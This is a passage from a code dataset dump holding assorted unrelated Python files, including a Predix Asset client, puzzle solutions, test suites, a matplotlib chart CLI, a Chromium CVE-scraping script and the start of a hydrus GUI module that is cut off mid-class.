content
stringlengths 5
1.05M
|
---|
import os
import json
import uuid
import logging
import requests
import predix.config
import predix.service
import predix.security.uaa
class Asset(object):
"""
Client library for working with the Predix Asset Service. For more details
on use of the service please see official docs:
https://www.predix.io/services/service.html?id=1171
"""
def __init__(self, uri=None, zone_id=None, *args, **kwargs):
super(Asset, self).__init__(*args, **kwargs)
self.uri = uri or self._get_uri()
self.zone_id = zone_id or self._get_zone_id()
self.service = predix.service.Service(self.zone_id)
def _get_uri(self):
"""
Returns the URI endpoint for an instance of the Asset
service from environment inspection.
"""
if 'VCAP_SERVICES' in os.environ:
services = json.loads(os.getenv('VCAP_SERVICES'))
predix_asset = services['predix-asset'][0]['credentials']
return predix_asset['uri']
else:
return predix.config.get_env_value(self, 'uri')
def _get_zone_id(self):
"""
Returns the Predix Zone Id for the service that is a required
header in service calls.
"""
if 'VCAP_SERVICES' in os.environ:
services = json.loads(os.getenv('VCAP_SERVICES'))
predix_asset = services['predix-asset'][0]['credentials']
return predix_asset['zone']['http-header-value']
else:
return predix.config.get_env_value(self, 'zone_id')
def authenticate_as_client(self, client_id, client_secret):
"""
Will authenticate for the given client / secret.
"""
self.service.uaa.authenticate(client_id, client_secret)
def _get_collections(self):
"""
Returns the names of all user-defined domain object collections with
counts for number of domain objects contained in that collection.
..
[ { "collection": "volcano", "count": 1 }, ... ]
"""
uri = self.uri
return self.service._get(uri)
def get_collections(self):
"""
Returns a flat list of the names of collections in the asset
service.
..
['wind-turbines', 'jet-engines']
"""
collections = []
for result in self._get_collections():
collections.append(result['collection'])
return collections
def get_collection(self, collection, filter=None, fields=None,
page_size=None):
"""
Returns a specific collection from the asset service with
the given collection endpoint.
Supports passing through parameters such as...
- filters such as "name=Vesuvius" following GEL spec
- fields such as "uri,description" comma delimited
- page_size such as "100" (the default)
"""
params = {}
if filter:
params['filter'] = filter
if fields:
params['fields'] = fields
if page_size:
params['pageSize'] = page_size
uri = self.uri + '/v1' + collection
return self.service._get(uri, params=params)
def create_guid(self, collection=None):
"""
Returns a new guid for use in posting a new asset to a collection.
"""
guid = str(uuid.uuid4())
if collection:
return str.join('/', [collection, guid])
else:
return guid
def post_collection(self, collection, body):
"""
Creates a new collection. This is mostly just transport layer
and passes collection and body along. It presumes the body
already has generated.
The collection is *not* expected to have the id.
"""
assert isinstance(body, (list)), "POST requires body to be a list"
assert collection.startswith('/'), "Collections must start with /"
uri = self.uri + '/v1' + collection
return self.service._post(uri, body)
def put_collection(self, collection, body):
"""
Updates an existing collection.
The collection being updated *is* expected to include the id.
"""
uri = self.uri + '/v1' + collection
return self.service._put(uri, body)
def delete_collection(self, collection):
"""
Deletes an existing collection.
The collection being updated *is* expected to include the id.
"""
uri = str.join('/', [self.uri, collection])
return self.service._delete(uri)
def patch_collection(self, collection, changes):
"""
Will make specific updates to a record based on JSON Patch
documentation.
https://tools.ietf.org/html/rfc6902
the format of changes is something like::
[{
'op': 'add',
'path': '/newfield',
'value': 'just added'
}]
"""
uri = str.join('/', [self.uri, collection])
return self.service._patch(uri, changes)
def get_audit(self):
"""
Return audit report for asset. Disabled by default.
"""
return self.service._get(self.uri + '/v1/system/audit')
def get_audit_changes(self):
"""
Return change log for audit. Disabled by default.
"""
return self.service._get(self.uri + '/v1/system/audit/changes')
def get_audit_snapshots(self):
"""
Return an audit snapshot. Disabled by default.
"""
return self.service._get(self.uri + '/v1/system/audit/snapshots')
def get_scripts(self):
"""
Return any configured scripts for asset service.
"""
return self.service._get(self.uri + '/v1/system/scripts')
def get_messages(self):
"""
Return any system messages related to asset systems.
"""
return self.service._get(self.uri + '/v1/system/messages')
def get_configs(self):
"""
Return the configuration for the asset service.
"""
return self.service._get(self.uri + '/v1/system/configs')
def get_triggers(self):
"""
Return configured triggers in the asset system.
"""
return self.service._get(self.uri + '/v1/system/triggers')
def save(self, collection):
"""
Save an asset collection to the service.
"""
assert isinstance(collection, predix.data.asset.AssetCollection), "Expected AssetCollection"
collection.validate()
self.put_collection(collection.uri, collection.__dict__) # MAINT: no
class AssetCollection(object):
"""
User Defined Domain Objects are the customizable collections to represent
data in the Asset Service.
This is experimental to provide a base class for a sort of ORM between
domain objects to marshall and unmarshall between Python and the REST
endpoints.
"""
def __init__(self, parent=None, guid=None, *args, **kwargs):
super(AssetCollection, self).__init__(*args, **kwargs)
# You have the right to a guid, if you cannot afford a guid...
if not guid:
guid = str(uuid.uuid4())
# By naming collection after classname we get safe URI
# naming rules as well.
collection = self.get_collection()
# There is a no more than 2 forward slash limitation for uri, so
# collections cannot really be nested deeper than one level.
self.uri = '/' + str.join('/', [collection, guid])
def __repr__(self):
return json.dumps(self.__dict__)
def __str__(self):
return json.dumps(self.__dict__)
def get_collection(self):
return type(self).__name__.lower()
def validate(self):
"""
If an asset collection wants any client-side validation the
object can override this method and it is called anytime
we're saving.
"""
return
|
from typing import List, Tuple
from collections import defaultdict
BASE_PATH = "../../inputs/day03"
def solution_1(binary_lines: List[str]) -> int:
count_list = [defaultdict(int) for _ in range(len(binary_lines[0]))]
gamma = epsilon = ""
aux_values = ["0", "1"]
for binary_line in binary_lines:
for i, c in enumerate(binary_line):
count_list[i][c] += 1
for count in count_list:
temp = int(count['0'] < count['1'])
gamma += aux_values[temp]
epsilon += aux_values[(temp + 1) % 2]
return int(gamma, 2) * int(epsilon, 2)
def filter_lines(lines: List[str], oxigen_criteria: bool) -> int:
index = 0
aux = ["0", "1"]
while 1 < len(lines) and index < len(lines[0]):
count = {"0": [], "1": []}
for line in lines:
count[line[index]].append(line)
bit_criteria = aux[(int(len(count["1"]) >= len(count["0"])) + int(not oxigen_criteria)) % 2]
lines = count[bit_criteria]
index += 1
return int(lines[0], 2)
def solution_2(binary_lines) -> int:
ox = filter_lines(binary_lines, True)
co2 = filter_lines(binary_lines, False)
return ox * co2
for file_name in ["test.txt", "sol.txt"]:
with open(f"{BASE_PATH}/{file_name}") as f:
lines = [l.strip() for l in f]
print(f"Solutions for {file_name}:")
sol1 = solution_1(lines)
print(f"Part 1: {sol1}")
sol2 = solution_2(lines)
print(f"Part 2: {sol2}")
|
###############################################################################
# FIRESTARTER - A Processor Stress Test Utility
# Copyright (C) 2017 TU Dresden, Center for Information Services and High
# Performance Computing
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: [email protected]
###############################################################################
def target_all(file,targets):
file.write("all: {}\n".format(targets))
def src_obj_files(file,templates,version):
src_files = ''
obj_files = ''
src_files_win = ''
obj_files_win = ''
for each in templates:
src_files = each.file+'.c '+src_files
obj_files = each.file+'.o '+obj_files
if each.win64_incl == 1:
src_files_win = each.file+'.c '+src_files_win
obj_files_win = each.file+'_win64.o '+obj_files_win
file.write("ASM_FUNCTION_SRC_FILES="+src_files+"\n")
file.write("ASM_FUNCTION_OBJ_FILES="+obj_files+"\n")
if version.enable_win64 == 1:
file.write("ASM_FUNCTION_SRC_FILES_WIN="+src_files_win+"\n")
file.write("ASM_FUNCTION_OBJ_FILES_WIN="+obj_files_win+"\n")
def template_rules(file,templates,version):
for each in templates:
flags = ''
for flag in each.flags:
flags = flag+' '+flags
file.write(each.file+".o: "+each.file+".c\n")
file.write("\t${LINUX_CC} ${OPT_ASM} ${LINUX_C_FLAGS} "+flags+" -c "+each.file+".c\n\n")
if (version.enable_win64 == 1) and (each.win64_incl == 1):
file.write(each.file+"_win64.o: "+each.file+".c\n")
file.write("\t${WIN64_CC} ${OPT_ASM} ${WIN64_C_FLAGS} "+flags+" -c "+each.file+".c -o "+each.file+"_win64.o\n\n")
|
# Refaça o desafio 035 dos triângulos, acrescentando o recurso
# de mostrar que tipo de triângulo será formado:
# - Equilátero
# - Isósceles
# - Escaleno
a = int(input('Lado A: '))
b = int(input('Lado B: '))
c = int(input('Lado C: '))
if a + b >= c and a + c >= b and b + c >= a:
if a == b == c:
print('\nTriângulo equilátero!')
elif a != b != c != a:
print('\nTriângulo escaleno!')
else:
print('\nTriângulo isósceles!')
else:
print('\nOs lados digitados NÃO formam um triângulo!') |
import pandas as pd
from reamber.o2jam.O2JHold import O2JHold
from tests.test.o2jam.test_fixture import o2j_mapset
def test_type(o2j_mapset):
assert isinstance(o2j_mapset[0].holds[0], O2JHold)
def test_from_series():
hold = O2JHold.from_series(pd.Series(dict(offset=1000, column=1, length=1000, volume=2, pan=3)))
assert O2JHold(1000, 1, 1000, 2, 3) == hold
|
# encoding: utf-8
from ckan.common import CKANConfig
import ckan.plugins as plugins
import ckan.plugins.toolkit as toolkit
def most_popular_groups():
'''Return a sorted list of the groups with the most datasets.'''
# Get a list of all the site's groups from CKAN, sorted by number of
# datasets.
groups = toolkit.get_action('group_list')(
{}, {'sort': 'package_count desc', 'all_fields': True})
# Truncate the list to the 10 most popular groups only.
groups = groups[:10]
return groups
class ExampleThemePlugin(plugins.SingletonPlugin):
'''An example theme plugin.
'''
plugins.implements(plugins.IConfigurer)
# Declare that this plugin will implement ITemplateHelpers.
plugins.implements(plugins.ITemplateHelpers)
def update_config(self, config: CKANConfig):
# Add this plugin's templates dir to CKAN's extra_template_paths, so
# that CKAN will use this plugin's custom templates.
toolkit.add_template_directory(config, 'templates')
def get_helpers(self):
'''Register the most_popular_groups() function above as a template
helper function.
'''
# Template helper function names should begin with the name of the
# extension they belong to, to avoid clashing with functions from
# other extensions.
return {'example_theme_most_popular_groups': most_popular_groups}
|
# -*- coding: utf-8 -*-
"""
Created on Fri May 18 21:24:46 2018
@author: mai1346
"""
from Event import FillEvent
from abc import ABC, abstractmethod
class ExecutionHandler(ABC):
@abstractmethod
def execute_order(self, event):
raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
'''
生成模拟的FILL事件。
'''
def __init__(self, events, data_handler):
self.events = events
self.data_handler = data_handler
def execute_order(self, orderevent):
if orderevent.type == 'ORDER':
fill_event = FillEvent(
orderevent.datetime, orderevent.symbol,
'Test_Exchange', orderevent.quantity, orderevent.direction, orderevent.order_type,
self.data_handler.get_latest_bars_values(orderevent.symbol, "close")[0] # [0] because it's a np array
)
self.events.put(fill_event) |
__author__ = 'pzdeb'
|
from django.contrib import admin
from .models import EmailTemplate
admin.site.register(EmailTemplate)
|
import json
class UserNotInFile(Exception):
pass
class JF():
def __init__(self, jsonfile):
self.file = jsonfile
def __write(self, data):
with open(self.file, "w") as f:
json.dump(data, f, indent=4)
def __getall(self):
with open(self.file) as f:
return json.load(f)
def __user_in_file(self, userid):
all = self.__getall()
if all.get(str(userid)) == None:
return False
return True
def get_points(self, userid):
all = self.__getall()
try:
points = all[str(userid)]
except KeyError:
return 0
else:
return points
def order(self):
all = self.__getall()
return sorted(all.items() , reverse=True, key=lambda x: x[1])
def change_points(self, userid, points):
all = self.__getall()
if self.__user_in_file(str(userid)):
if self.get_points(str(userid)) + points <= 0:
all[str(userid)] = 0
else:
current_points = all[str(userid)]
all[str(userid)] = current_points + points
else:
if points <= 0:
all.update({str(userid): 0})
else:
all.update({str(userid): points})
self.__write(all)
if __name__ == '__main__':
x = JF("points.json").order()
print(x) |
import matplotlib.pyplot as plt
import random
import time
import pandas as pd
import colorama
import os
import sys
import requests
import platform
import math
from bs4 import BeautifulSoup as soup
from colorama import Fore
import numpy as np
wi="\033[1;37m" #>>White#
rd="\033[1;31m" #>Red #
gr="\033[1;32m" #>Green #
yl="\033[1;33m" #>Yellow#
#data = {
#"calories": [420, 380, 390],
#"duration": [50, 40, 45]
#}
#load data into a DataFrame object:
#df = pd.DataFrame(data)
#print(df)
#
#Country = ['USA','Canada','Germany','UK','France']
#GDP_Per_Capita = [45000,42000,52000,49000,47000]
#plt.bar(Country, GDP_Per_Capita)
#plt.title('Country Vs GDP Per Capita')
#plt.xlabel('Country')
#plt.ylabel('GDP Per Capita')
#plt.show()
sys = platform.system()
def banner():
print(Fore.CYAN + '''
███████████ █████ █████
░░███░░░░░███ ░░███ ░░███
░███ ░███ █████ ████ ██████ ░███████ ██████ ████████ ███████
░██████████ ░░███ ░███ ███░░███ ░███░░███ ░░░░░███ ░░███░░███░░░███░
░███░░░░░░ ░███ ░███ ░███ ░░░ ░███ ░███ ███████ ░███ ░░░ ░███
░███ ░███ ░███ ░███ ███ ░███ ░███ ███░░███ ░███ ░███ ███
█████ ░░███████ ░░██████ ████ █████░░████████ █████ ░░█████
░░░░░ ░░░░░███ ░░░░░░ ░░░░ ░░░░░ ░░░░░░░░ ░░░░░ ░░░░░
███ ░███
''')
print(wi + rd + "Tool that can generate charts, using the module matplotlib")
def random():
print(wi + yl + 'Bar=0, Line=1, scatter=2, pie=3')
commandhere = input("Choose Graph Type: ")
if commandhere == "1":
title = input("Title Of Graph: ")
label1 = input("Input 2 Titles: ")
label2 = input("Input 1 More Title: ")
plt.style.use('dark_background')
fig, ax = plt.subplots()
L = 6
x = np.linspace(0, L)
ncolors = len(plt.rcParams['axes.prop_cycle'])
shift = np.linspace(0, L, ncolors, endpoint=False)
for s in shift:
ax.plot(x, np.sin(x + s), 'o-')
ax.set_xlabel(label1)
ax.set_ylabel(label2)
ax.set_title(title)
plt.show()
elif commandhere == "0":
title1 = input("Input Title For stepfilled Graph: ")
title2 = input("Input Title For step Graph: ")
title3 = input("Input Title For barstacked Graph: ")
title4 = input("Input Title For unequal bins Graph: ")
np.random.seed(19680801)
mu_x = 200
sigma_x = 25
x = np.random.normal(mu_x, sigma_x, size=100)
mu_w = 200
sigma_w = 10
w = np.random.normal(mu_w, sigma_w, size=100)
fig, axs = plt.subplots(nrows=2, ncols=2)
axs[0, 0].hist(x, 20, density=True, histtype='stepfilled', facecolor='g',
alpha=0.75)
axs[0, 0].set_title(title1)
axs[0, 1].hist(x, 20, density=True, histtype='step', facecolor='g',
alpha=0.75)
axs[0, 1].set_title(title2)
axs[1, 0].hist(x, density=True, histtype='barstacked', rwidth=0.8)
axs[1, 0].hist(w, density=True, histtype='barstacked', rwidth=0.8)
axs[1, 0].set_title(title3)
# Create a histogram by providing the bin edges (unequally spaced).
bins = [100, 150, 180, 195, 205, 220, 250, 300]
axs[1, 1].hist(x, bins, density=True, histtype='bar', rwidth=0.8)
axs[1, 1].set_title(title4)
fig.tight_layout()
plt.show()
elif commandhere == "2":
np.random.seed(19680801)
fig, ax = plt.subplots()
for color in ['tab:blue', 'tab:orange', 'tab:green']:
n = 750
x, y = np.random.rand(2, n)
scale = 200.0 * np.random.rand(n)
ax.scatter(x, y, c=color, s=scale, label=color,
alpha=0.3, edgecolors='none')
ax.legend()
ax.grid(True)
plt.show()
elif commandhere == "3":
fig, ax = plt.subplots(figsize=(6, 3), subplot_kw=dict(aspect="equal"))
recipe = ["225 g flour",
"90 g sugar",
"1 egg",
"60 g butter",
"100 ml milk",
"1/2 package of yeast"]
data = [225, 90, 50, 60, 100, 5]
wedges, texts = ax.pie(data, wedgeprops=dict(width=0.5), startangle=-40)
bbox_props = dict(boxstyle="square,pad=0.3", fc="w", ec="k", lw=0.72)
kw = dict(arrowprops=dict(arrowstyle="-"),
bbox=bbox_props, zorder=0, va="center")
for i, p in enumerate(wedges):
ang = (p.theta2 - p.theta1) / 2. + p.theta1
y = np.sin(np.deg2rad(ang))
x = np.cos(np.deg2rad(ang))
horizontalalignment = {-1: "right", 1: "left"}[int(np.sign(x))]
connectionstyle = "angle,angleA=0,angleB={}".format(ang)
kw["arrowprops"].update({"connectionstyle": connectionstyle})
ax.annotate(recipe[i], xy=(x, y), xytext=(1.35 * np.sign(x), 1.4 * y),
horizontalalignment=horizontalalignment, **kw)
ax.set_title("Matplotlib bakery: A donut")
plt.show()
def update():
url = 'https://github.com/FonderElite/chartgen'
r = requests.get(url)
soupi = soup(r.content, "html.parser")
# font = soup.find("b", text="Past Movies:").find_next_sibling("font")
dte = soupi.find(text="19 hours ago")
print("Checking last commit date...")
time.sleep(2)
if dte != "19 hours ago":
print("New Commit! kindly check:https://github.com/FonderElite/chartgen")
else:
print(rd + "No recent commits.")
def help():
print(yl + '''
=============================================
+| Chart-Gen By Fonder-Elite |+
+|-----------------------------------------|+
+| -h Help |+
+| -c chart |+
+| -r random |+
+| -s Start |+
+| -u Update |+
+| -q Quit |+
+|Ex. ./chartgen -c -s (Generate Chart) |+
+|Ex. ./chartgen -c -r -s (Random Chart) |+
+|=========================================|+
''')
banner()
time.sleep(2)
help()
try:
import matplotlib
import bs4
import requests
import colorama
except Exception:
print(Fore.CYAN + "Missing Modules.")
os.system('pip install matplotlib')
def chartgen():
graphs = ["bar","line","scatter","pie"]
print('Bar=0, Line=1, scatter=2, pie=3')
datatype = input("Choose Graph Type: ")
if datatype == "0":
title = input("Title Of Graph: ")
letters = input('Input 4 Titles: ')
letters2 = input("Input 3 More Titles:")
letters3 = input("Input 2 More Titles:")
letters4 = input("Input 1 More Title:")
numbers = input("Input 4 Values: ")
numbers2 = input("Input 3 More Values: ")
numbers3 = input("Input 2 More Values: ")
numbers4 = input("Input 1 More Values: ")
arr = [letters,letters2,letters3,letters4]
numbersarr = [numbers,numbers2,numbers3,numbers4]
plt.bar(arr, numbersarr)
plt.title(title)
plt.xlabel(arr)
plt.ylabel(numbers)
plt.show()
elif datatype == "1":
title = input("Title Of Graph: ")
letters = input('Input 4 Titles: ')
letters2 = input("Input 3 More Titles:")
letters3 = input("Input 2 More Titles:")
letters4 = input("Input 1 More Title:")
numbers = input("Input 4 Values: ")
numbers2 = input("Input 3 More Values: ")
numbers3 = input("Input 2 More Values: ")
numbers4 = input("Input 1 More Values: ")
arr = [letters, letters2, letters3, letters4]
numbersarr = [numbers, numbers2, numbers3, numbers4]
fig, ax = plt.subplots()
ax.plot(arr, numbersarr)
ax.set(xlabel=arr, ylabel=numbersarr,
title=title)
ax.grid()
plt.show()
elif datatype == "2":
title = input("Title Of Graph: ")
letters = input('Input 4 Titles: ')
letters2 = input("Input 3 More Titles:")
letters3 = input("Input 2 More Titles:")
letters4 = input("Input 1 More Title:")
numbers = input("Input 4 Values: ")
numbers2 = input("Input 3 More Values: ")
numbers3 = input("Input 2 More Values: ")
numbers4 = input("Input 1 More Values: ")
arr = [letters, letters2, letters3, letters4]
numbersarr = [numbers, numbers2, numbers3, numbers4]
x = np.arange(0, math.pi * 2, 0.05)
y = np.sin(x)
plt.scatter(arr,numbersarr)
plt.xlabel(arr)
plt.ylabel(numbersarr)
plt.title(title)
plt.show()
elif datatype == "3":
title = input("Title Of Graph: ")
letters = input('Input 4 Titles: ')
letters2 = input("Input 3 More Titles:")
letters3 = input("Input 2 More Titles:")
letters4 = input("Input 1 More Title:")
numbers = input("Input 4 Values: ")
numbers2 = input("Input 3 More Values: ")
numbers3 = input("Input 2 More Values: ")
numbers4 = input("Input 1 More Values: ")
arr = [letters, letters2, letters3, letters4]
numbersarr = [numbers, numbers2, numbers3, numbers4]
fig = plt.figure()
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('equal')
langs = ['C', 'C++', 'Java', 'Python', 'PHP']
students = [23, 17, 35, 29, 12]
ax.pie(numbersarr, labels=arr, autopct='%1.2f%%')
plt.title(title)
plt.show()
while True:
command = input(wi + sys + '-User: ')
if command == './chartgen':
help()
elif command == "./chartgen -h":
help()
elif command == "./chartgen -u":
update()
elif command == "./chartgen -c -s":
chartgen()
elif command == "./chartgen -c -r -s":
random()
else:
print(Fore.RED + '''
___ __ __ __ __
|__ |__) |__) / \ |__)
|___ | \ | \ \__/ | \ ''')
print(Fore.BLUE + '''
__n__n__
.------`-/00/-'
/ ## ## (oo) Woops.
/ \## __ ./
|//YY \|/
||| ||| \|/
''')
|
from cortexpy.graph.interactor import Interactor
from cortexpy.test.builder.graph.cortex import (
CortexGraphBuilder,
get_cortex_builder,
LinksBuilder,
)
class TestCortex(object):
def test_emits_one_single_color_unitig(self):
# given
b = CortexGraphBuilder()
b.with_colors(0)
b.add_edge('AAA', 'AAT', color=0)
b.make_consistent('AAA')
graph = b.build()
# when
paths = list(Interactor(graph).all_simple_paths())
# then
assert ['AAAT'] == [str(p.seq) for p in paths]
def test_only_follows_one_color_with_color_specified(self):
# given
b = CortexGraphBuilder()
b.with_colors(0, 1)
b.add_edge('AAA', 'AAT', color=0)
b.add_edge('AAT', 'ATA', color=1)
b.make_consistent('AAA')
graph = b.build()
# when
paths = list(Interactor(graph).keep_color(0).all_simple_paths())
# then
assert ['AAAT'] == [str(p.seq) for p in paths]
def test_follows_two_colors_with_no_color_specified(self):
# given
b = CortexGraphBuilder()
b.with_colors(0, 1)
b.add_edge('AAA', 'AAT', color=0)
b.add_edge('AAT', 'ATA', color=1)
b.make_consistent('AAA')
graph = b.build()
# when
paths = list(Interactor(graph).all_simple_paths())
# then
assert {'AAATA'} == set([str(p.seq) for p in paths])
def test_follows_three_colors_with_no_color_specified(self):
# given
b = CortexGraphBuilder()
b.with_colors(0, 1, 2)
b.add_edge('AAA', 'AAT', color=0)
b.add_edge('AAT', 'ATA', color=1)
b.add_edge('AAT', 'ATC', color=2)
b.make_consistent('AAA')
graph = b.build()
# when
paths = list(Interactor(graph).all_simple_paths())
# then
assert {'AAATA', 'AAATC'} == set([str(p.seq) for p in paths])
def test_in_y_graph_finds_two_paths(self):
# given
b = CortexGraphBuilder()
b.add_path('CAA', 'AAA')
b.add_path('TAA', 'AAA')
b.make_consistent('AAA')
cdb = b.build()
# when
paths = list(Interactor(cdb).all_simple_paths())
# then
assert {'CAAA', 'TAAA'} == set([str(p.seq) for p in paths])
def test_in_y_graph_finds_two_paths_of_revcomp(self):
# given
b = get_cortex_builder()
b.with_kmer('CGC 1 .......T')
b.with_kmer('AGC 1 a....CG.')
b.with_kmer('AAG 1 .....C..')
b.with_kmer('GCC 1 a.......')
cdb = b.build()
cdb = Interactor(cdb).make_graph_nodes_consistent(['AAG']).graph
# when
paths = list(Interactor(cdb).all_simple_paths())
# then
assert ['AAGCC', 'AAGCG'] == sorted([str(p.seq) for p in paths])
class TestLinks:
def test_with_link_for_y_graph_emits_one_path(self):
# given
b = CortexGraphBuilder()
b.with_kmer_size(3)
b.add_path('AAA', 'AAC')
b.add_path('AAA', 'AAT')
b.make_consistent('AAA')
cdb = b.build()
links = LinksBuilder() \
.with_link_for_kmer('F 1 1 C', 'AAA') \
.build()
# when
paths = list(Interactor(cdb).all_simple_paths(links=links))
# then
assert ['AAAC'] == [str(p.seq) for p in paths]
def test_bubble_and_y_with_two_links_returns_two_transcripts(self):
# given
links = LinksBuilder() \
.with_link_for_kmer('F 2 1 CT', 'AAA') \
.with_link_for_kmer('F 1 1 A', 'CCC') \
.build()
b = CortexGraphBuilder()
b.with_kmer_size(3)
b.add_path('AAA', 'AAC', 'ACC', 'CCC', 'CCA')
b.add_path('AAA', 'AAG', 'AGC', 'GCC', 'CCC', 'CCT')
b.make_consistent('AAA')
cdb = b.build()
# when
paths = list(Interactor(cdb).all_simple_paths(links=links))
# then
assert ['AAACCCA', 'AAACCCT'] == sorted([str(p.seq) for p in paths])
def test_bubble_and_y_with_two_links_returns_three_transcripts(self):
# given
links = LinksBuilder() \
.with_link_for_kmer('F 2 1 CT', 'AAA') \
.with_link_for_kmer('F 1 1 G', 'AAA') \
.build()
b = CortexGraphBuilder()
b.with_kmer_size(3)
b.add_path('AAA', 'AAC', 'ACC', 'CCC', 'CCA')
b.add_path('AAA', 'AAG', 'AGC', 'GCC', 'CCC', 'CCT')
b.make_consistent('AAA')
cdb = b.build()
# when
paths = list(Interactor(cdb).all_simple_paths(links=links))
# then
assert ['AAACCCT', 'AAAGCCCA', 'AAAGCCCT'] == sorted([str(p.seq) for p in paths])
|
#!/usr/bin/env python3
"""my product1
"""
def my_product1(n):
"""
>>> my_product1(3)
6
>>> my_product1(10)
3628800
"""
res = 1
for i in range(n):
res *= i+1
return res
if __name__ == '__main__':
import doctest
doctest.testmod()
|
# SPDX-License-Identifier: MIT
import json
import re
import click
import requests
from lxml import etree
CHROMIUM_VERSION_REGEX = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
@click.command()
@click.argument("url", nargs=-1)
@click.option(
"--output",
type=click.File("w"),
default=click.get_text_stream("stdout"),
help="Output file with CVEs in JSON format (defaults to stdout)",
)
def chromium(url, output):
"""Extract CVEs for Chromium from their release blog posts"""
cves = []
for advisory_url in url:
advisory = requests.get(advisory_url).content
advisory = etree.fromstring(advisory, etree.HTMLParser())
new_version = advisory.xpath(
f'string(//span[re:test(text(), "{CHROMIUM_VERSION_REGEX}")]/text())',
namespaces={"re": "http://exslt.org/regular-expressions"},
)
new_version = re.search(CHROMIUM_VERSION_REGEX, new_version).group()
cve_descriptions = advisory.xpath('//span[starts-with(text(), "CVE-")]/text()')
cve_descriptions = [
re.split(": | in ", description.strip(". "))
for description in cve_descriptions
]
cves += [
{
"name": cve.strip(),
"type": "Unknown",
"severity": advisory.xpath(
f'normalize-space(//span[starts-with(text(), "{cve}")]/preceding-sibling::span[1]/text())'
),
"vector": "Remote",
"description": f"A {type.lower()} security issue has been found in the {component} component of the Chromium browser engine before version {new_version}.",
"references": [
advisory_url,
advisory.xpath(
f'string(//span[starts-with(text(), "{cve}")]/preceding-sibling::a[1]/@href)'
),
],
"notes": None,
}
for cve, type, component in cve_descriptions
]
output.write(json.dumps(cves, indent=2, ensure_ascii=False))
|
from pycfmodel.model.cf_model import CFModel
from pytest import fixture
from cfripper.rules import PolicyOnUserRule
from tests.utils import get_cfmodel_from
@fixture()
def good_template():
return get_cfmodel_from("rules/PolicyOnUserRule/good_template.json").resolve()
@fixture()
def bad_template():
return get_cfmodel_from("rules/PolicyOnUserRule/bad_template.json").resolve()
def test_no_failures_are_raised(good_template):
rule = PolicyOnUserRule(None)
result = rule.invoke(good_template)
assert result.valid
assert len(result.failed_rules) == 0
assert len(result.failed_monitored_rules) == 0
def test_failures_are_raised(bad_template: CFModel):
rule = PolicyOnUserRule(None)
result = rule.invoke(bad_template)
assert not result.valid
assert len(result.failed_rules) == 1
assert len(result.failed_monitored_rules) == 0
assert result.failed_rules[0].rule == "PolicyOnUserRule"
assert result.failed_rules[0].reason == "IAM policy Policy should not apply directly to users. Should be on group"
|
import ClientConstants as CC
import ClientGUIACDropdown
import ClientGUICommon
import ClientGUIListBoxes
import ClientGUIListCtrl
import ClientGUIScrolledPanels
import ClientGUIScrolledPanelsEdit
import ClientGUITopLevelWindows
import ClientImporting
import ClientImportOptions
import collections
import HydrusConstants as HC
import HydrusData
import HydrusGlobals as HG
import HydrusTags
import HydrusText
import os
import re
import wx
import wx.adv
class FileImportOptionsButton( ClientGUICommon.BetterButton ):
def __init__( self, parent, file_import_options, update_callable = None ):
ClientGUICommon.BetterButton.__init__( self, parent, 'file import options', self._EditOptions )
self._file_import_options = file_import_options
self._update_callable = update_callable
self._SetToolTip()
def _EditOptions( self ):
with ClientGUITopLevelWindows.DialogEdit( self, 'edit file import options' ) as dlg:
panel = ClientGUIScrolledPanelsEdit.EditFileImportOptions( dlg, self._file_import_options )
dlg.SetPanel( panel )
if dlg.ShowModal() == wx.ID_OK:
file_import_options = panel.GetValue()
self._SetValue( file_import_options )
def _SetToolTip( self ):
self.SetToolTip( self._file_import_options.GetSummary() )
def _SetValue( self, file_import_options ):
self._file_import_options = file_import_options
self._SetToolTip()
if self._update_callable is not None:
self._update_callable( self._file_import_options )
def GetValue( self ):
return self._file_import_options
def SetValue( self, file_import_options ):
self._SetValue( file_import_options )
class FilenameTaggingOptionsPanel( wx.Panel ):
def __init__( self, parent, service_key, tag_update_callable, filename_tagging_options = None, present_for_accompanying_file_list = False ):
if filename_tagging_options is None:
# pull from an options default
filename_tagging_options = ClientImportOptions.FilenameTaggingOptions()
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._notebook = wx.Notebook( self )
# eventually these will take 'regexoptions' or whatever object and 'showspecificfiles' as well
self._simple_panel = self._SimplePanel( self._notebook, self._service_key, tag_update_callable, filename_tagging_options, present_for_accompanying_file_list )
self._advanced_panel = self._AdvancedPanel( self._notebook, self._service_key, tag_update_callable, filename_tagging_options, present_for_accompanying_file_list )
self._notebook.AddPage( self._simple_panel, 'simple', select = True )
self._notebook.AddPage( self._advanced_panel, 'advanced' )
vbox = wx.BoxSizer( wx.VERTICAL )
vbox.Add( self._notebook, CC.FLAGS_EXPAND_SIZER_BOTH_WAYS )
self.SetSizer( vbox )
def GetFilenameTaggingOptions( self ):
filename_tagging_options = ClientImportOptions.FilenameTaggingOptions()
self._advanced_panel.UpdateFilenameTaggingOptions( filename_tagging_options )
self._simple_panel.UpdateFilenameTaggingOptions( filename_tagging_options )
return filename_tagging_options
def GetTags( self, index, path ):
tags = set()
tags.update( self._simple_panel.GetTags( index, path ) )
tags.update( self._advanced_panel.GetTags( index, path ) )
tags = HydrusTags.CleanTags( tags )
siblings_manager = HG.client_controller.GetManager( 'tag_siblings' )
parents_manager = HG.client_controller.GetManager( 'tag_parents' )
tag_censorship_manager = HG.client_controller.GetManager( 'tag_censorship' )
tags = siblings_manager.CollapseTags( self._service_key, tags )
tags = parents_manager.ExpandTags( self._service_key, tags )
tags = tag_censorship_manager.FilterTags( self._service_key, tags )
return tags
def SetSelectedPaths( self, paths ):
self._simple_panel.SetSelectedPaths( paths )
class _AdvancedPanel( wx.Panel ):
def __init__( self, parent, service_key, refresh_callable, filename_tagging_options, present_for_accompanying_file_list ):
wx.Panel.__init__( self, parent )
self._service_key = service_key
self._refresh_callable = refresh_callable
self._present_for_accompanying_file_list = present_for_accompanying_file_list
#
